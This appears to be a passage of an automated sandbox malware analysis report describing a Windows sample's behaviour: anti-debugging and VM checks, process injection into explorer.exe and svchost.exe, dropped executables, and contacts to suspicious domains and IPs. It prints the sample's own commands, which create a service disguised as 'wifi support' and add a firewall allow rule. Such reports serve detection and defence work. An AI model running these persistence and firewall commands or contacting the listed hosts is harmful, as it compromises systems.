                          Source: C:\Windows\explorer.exe TID: 6268Thread sleep count: 569 > 30
                          Source: C:\Windows\explorer.exe TID: 1972Thread sleep count: 235 > 30
                          Source: C:\Windows\explorer.exe TID: 2964Thread sleep count: 315 > 30
                          Source: C:\Windows\explorer.exe TID: 2964Thread sleep time: -31500s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 6816Thread sleep count: 357 > 30
                          Source: C:\Windows\explorer.exe TID: 1632Thread sleep count: 131 > 30
                          Source: C:\Windows\explorer.exe TID: 6820Thread sleep count: 191 > 30
                          Source: C:\Users\user\AppData\Local\Temp\2655.exe TID: 6968Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 569
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 357
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeAPI coverage: 0.3 %
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeAPI coverage: 5.6 %
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeAPI coverage: 4.1 %
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00406AA0
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D78A.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E3A0.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C71D.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BD87.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\454.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeEvaded block: after key decision
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\454.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\454.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\454.exeAPI call chain: ExitProcess graph end node
                          Source: explorer.exe, 00000006.00000000.295441134.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                          Source: explorer.exe, 00000006.00000000.267652172.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000006.00000000.267746501.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                          Source: svchost.exe, 00000004.00000002.605784875.00000202DB660000.00000004.00000001.sdmpBinary or memory string: (@Hyper-V RAW
                          Source: svchost.exe, 00000004.00000002.539638373.00000202D6029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`2g
                          Source: svchost.exe, 00000004.00000002.604277894.00000202DB653000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.416712146.0000000004E8F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.416372198.0000000004E8F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.416177525.0000000004E3E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.422645887.0000000004E8F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.421518309.0000000004E3E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000006.00000000.267008275.00000000011B3000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$
                          Source: explorer.exe, 00000006.00000000.267008275.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                          Source: explorer.exe, 00000006.00000000.278663396.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                          Source: explorer.exe, 00000006.00000000.268516182.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                          Source: explorer.exe, 00000006.00000000.266948609.000000000113D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-716T77
                          Source: explorer.exe, 00000006.00000000.278663396.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                          Source: svchost.exe, 00000008.00000002.529602732.000001F815C68000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.526603110.000001468B829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\eugcwgvSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0040B46D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00460083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00470042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_005F0083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_0209092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_02090D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00D30083 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00D4092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00D40D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\eugcwgvProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_004034AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0040E623 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0040743C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_004034AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_004038B4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00408202 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: sehfdkfjvgn.xyz
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                          Source: C:\Windows\explorer.exeDomain query: softwaresworld.net
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: 8F03.exe.6.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\eugcwgvSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\eugcwgvSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processesShow sources
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 190000 protect: page execute and read and write
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeMemory written: C:\Users\user\Desktop\NNOKmCIVoi.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeMemory written: C:\Users\user\AppData\Local\Temp\2655.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 190000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00470110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeThread created: C:\Windows\explorer.exe EIP: 4F21930
                          Source: C:\Users\user\AppData\Roaming\eugcwgvThread created: unknown EIP: 5E01930
                          Writes to foreign memory regionsShow sources
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 190000
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3F5008
                          .NET source code references suspicious native API functionsShow sources
                          Source: 2655.exe.6.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 2655.exe.6.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 26.0.2655.exe.f80000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 26.0.2655.exe.f80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 26.0.2655.exe.f80000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 26.0.2655.exe.f80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 26.0.2655.exe.f80000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 26.0.2655.exe.f80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 26.2.2655.exe.f80000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 26.2.2655.exe.f80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeProcess created: C:\Users\user\Desktop\NNOKmCIVoi.exe "C:\Users\user\Desktop\NNOKmCIVoi.exe"
                          Source: C:\Users\user\AppData\Roaming\eugcwgvProcess created: C:\Users\user\AppData\Roaming\eugcwgv C:\Users\user\AppData\Roaming\eugcwgv
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2196 -ip 2196
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 520
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1316 -ip 1316
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 8
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hdysgoc\
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description hdysgoc "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start hdysgoc
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess created: C:\Users\user\AppData\Local\Temp\2655.exe C:\Users\user\AppData\Local\Temp\2655.exe
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000006.00000000.307463825.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.278695919.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.267117619.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.311196948.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.302775311.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.287311934.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.295562472.00000000089FF000.00000004.00000001.sdmp, 3412.exe, 00000014.00000000.368801209.0000000000CA0000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.369622165.0000000000CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000006.00000000.267117619.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.302775311.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.287311934.0000000001640000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.368801209.0000000000CA0000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.369622165.0000000000CA0000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000006.00000000.267117619.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.302775311.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.287311934.0000000001640000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.368801209.0000000000CA0000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.369622165.0000000000CA0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                          Source: explorer.exe, 00000006.00000000.302528361.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.286994041.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.266936516.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                          Source: explorer.exe, 00000006.00000000.267117619.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.302775311.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.287311934.0000000001640000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.368801209.0000000000CA0000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.369622165.0000000000CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                          Source: explorer.exe, 00000006.00000000.267117619.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.302775311.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.287311934.0000000001640000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.368801209.0000000000CA0000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.369622165.0000000000CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: __EH_prolog,OpenJobObjectA,GetLocaleInfoW,_ftell,_feof,_sprintf,
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
